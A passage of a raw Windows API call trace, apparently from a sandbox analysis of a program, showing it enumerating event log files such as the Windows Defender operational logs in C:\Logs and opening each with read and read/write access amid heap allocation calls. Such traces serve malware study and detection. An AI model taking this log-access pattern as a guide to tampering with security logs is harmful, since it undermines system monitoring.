HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0072.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0072.836] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0072.838] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0072.838] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0072.838] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0072.838] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0072.838] AreFileApisANSI () returned 1 [0072.838] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x538c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0072.838] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x66) returned 0x45ef8 [0072.838] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x538c8, cbMultiByte=-1, lpWideCharStr=0x45ef8, cchWideChar=51 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx") returned 51 [0072.838] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-wcmsvc%4operational.evtx"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc986efe1, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc986efe1, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0072.838] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45ef8 | out: hHeap=0x20000) returned 1 [0072.838] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0072.838] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0072.838] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0072.838] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.838] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.838] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb426548, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcb426548, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dace07, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-Windows Defender%4Operational.evtx", cAlternateFileName="MI7501~1.EVT")) returned 1 [0072.838] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0072.838] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0072.838] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0072.838] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69170 [0072.838] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0072.838] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46208 [0072.838] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69170 | out: hHeap=0x20000) returned 1 [0072.839] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x30c98 [0072.839] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46208 | out: hHeap=0x20000) returned 1 [0072.839] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0072.839] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0072.839] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0072.839] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0072.839] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0072.839] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30c98 | out: hHeap=0x20000) returned 1 [0072.839] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0072.839] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0072.839] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0072.839] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0072.839] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0072.839] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0072.839] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0072.839] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0072.839] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0072.839] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0072.839] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0072.839] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0072.839] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e7a0 [0072.839] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0072.839] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0072.839] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6eb58 [0072.839] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e7a0 | out: hHeap=0x20000) returned 1 [0072.839] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.839] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.839] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.839] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.839] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0072.839] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0072.839] AreFileApisANSI () returned 1 [0072.839] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx", lpUsedDefaultChar=0x0) returned 61 [0072.839] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0072.839] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.840] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.840] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0072.840] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0072.840] AreFileApisANSI () returned 1 [0072.840] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 61 [0072.840] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7a) returned 0x6e470 [0072.840] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x6e470, cchWideChar=61 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx") returned 61 [0072.840] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-windows defender%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0072.840] GetFileType (hFile=0x428) returned 0x1 [0072.840] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e470 | out: hHeap=0x20000) returned 1 [0072.840] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0072.840] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0072.841] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0072.841] CloseHandle (hObject=0x428) returned 1 [0072.841] AreFileApisANSI () returned 1 [0072.841] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 61 [0072.841] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7a) returned 0x6e580 [0072.841] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x6e580, cchWideChar=61 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx") returned 61 [0072.841] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-windows defender%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0072.841] GetFileType (hFile=0x428) returned 0x1 [0072.841] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e580 | out: hHeap=0x20000) returned 1 [0072.841] CloseHandle (hObject=0x428) returned 1 [0072.841] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75e40 [0072.841] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0072.841] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0072.841] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0072.842] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0072.842] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0072.842] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0072.842] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0072.842] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0072.842] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0072.842] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76098 [0072.842] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0072.842] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0072.842] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0072.842] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0072.842] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75e40 [0072.842] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0072.842] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76098 [0072.842] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0072.842] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0072.842] AreFileApisANSI () returned 1 [0072.842] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 61 [0072.842] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7a) returned 0x6df20 [0072.842] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x6df20, cchWideChar=61 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx") returned 61 [0072.842] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-windows defender%4operational.evtx"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb426548, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcb426548, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dace07, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0072.842] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6df20 | out: hHeap=0x20000) returned 1 [0072.842] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0072.842] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0072.842] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0072.842] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.842] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.842] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb4729e7, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcb4729e7, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-Windows Defender%4WHC.evtx", cAlternateFileName="MIF226~1.EVT")) returned 1 [0072.842] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0072.842] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0072.842] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0072.843] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68f40 [0072.843] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0072.843] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x463c8 [0072.843] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0072.843] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0072.843] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x716f0 [0072.843] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0072.843] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x716f0 | out: hHeap=0x20000) returned 1 [0072.843] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0072.843] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x463c8 | out: hHeap=0x20000) returned 1 [0072.843] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0072.843] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0072.843] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0072.843] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0072.843] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0072.843] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0072.843] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0072.843] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0072.843] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0072.843] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b00 [0072.843] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0072.843] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0072.843] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0072.843] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0072.843] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0072.843] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75e40 [0072.843] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0072.843] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.843] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.843] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.843] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.843] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0072.843] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0072.843] AreFileApisANSI () returned 1 [0072.844] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx", lpUsedDefaultChar=0x0) returned 53 [0072.844] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0072.844] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.844] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.844] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0072.844] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0072.844] AreFileApisANSI () returned 1 [0072.844] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0072.844] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75d50 [0072.844] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x75d50, cchWideChar=53 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx") returned 53 [0072.844] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx" (normalized: "c:\\logs\\microsoft-windows-windows defender%4whc.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0072.844] GetFileType (hFile=0x428) returned 0x1 [0072.844] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0072.844] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0072.844] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0072.845] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0072.845] CloseHandle (hObject=0x428) returned 1 [0072.845] AreFileApisANSI () returned 1 [0072.845] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0072.845] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x76110 [0072.845] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x76110, cchWideChar=53 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx") returned 53 [0072.845] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx" (normalized: "c:\\logs\\microsoft-windows-windows defender%4whc.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0072.845] GetFileType (hFile=0x428) returned 0x1 [0072.845] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0072.845] CloseHandle (hObject=0x428) returned 1 [0072.845] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x716f0 [0072.846] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0072.846] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0072.846] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0072.846] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0072.846] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0072.846] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x716f0 | out: hHeap=0x20000) returned 1 [0072.846] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0072.846] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b00 [0072.846] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0072.846] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0072.846] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0072.846] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0072.846] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0072.846] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0072.846] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b68 [0072.846] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0072.846] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0072.846] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0072.846] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0072.846] AreFileApisANSI () returned 1 [0072.846] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0072.846] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75d50 [0072.846] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x75d50, cchWideChar=53 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx") returned 53 [0072.846] GetFileAttributesExW (in: 